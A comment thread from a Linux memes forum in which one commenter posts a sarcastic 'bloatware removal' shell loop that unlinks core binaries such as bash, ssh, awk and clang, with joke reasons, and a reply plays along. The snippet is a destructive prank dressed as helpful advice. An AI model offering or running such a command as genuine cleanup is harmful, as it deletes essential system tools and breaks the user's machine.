this post was submitted on 09 Jul 2023
1243 points (97.3% liked)

linuxmemes

20688 readers
1180 users here now

I use Arch btw


Sister communities:

Community rules

  1. Follow the site-wide rules and code of conduct
  2. Be civil
  3. Post Linux-related content
  4. No recent reposts

Please report posts and comments that break these rules!

founded 1 year ago
MODERATORS
 
you are viewing a single comment's thread
view the rest of the comments
[โ€“] [email protected] 6 points 1 year ago* (last edited 1 year ago) (1 children)

Note that the more corporate distros install PUPs (Potentially Unwanted Programs). (like clang) To uninstall, do what youd do on a Windows machine and wrip it out of your PC forcably

while read bloatware; do bloatware="$(echo "$bloatware" | cut -f1 -d'#')"; file="$(whereis "$bloatware" | cut -f2 -d' ')"; if test -f "$file"; do unlink "$file"; fi; done <<bloatlist 
clang # unwanted telemitry
bash  # promotes violence
tree    # hippy garbage
awk    # secret backdoor into your PC
ssh    # isnt up to date on its intentional encryption backdoor certificate
bloatlist

/sHope nobody dumb enough to run this Because it actually works

[โ€“] [email protected] 3 points 1 year ago

Lol, I know what you mean.

Isn't it fucked up how we all say that linux doesn't have viruses, and yet how many times have you ever seen an install of Mint or Ubuntu that didn't have "Tree" or "Awk" just sitting there waiting to ruin your whole day.

I swear to God Canonical have some things to answer for.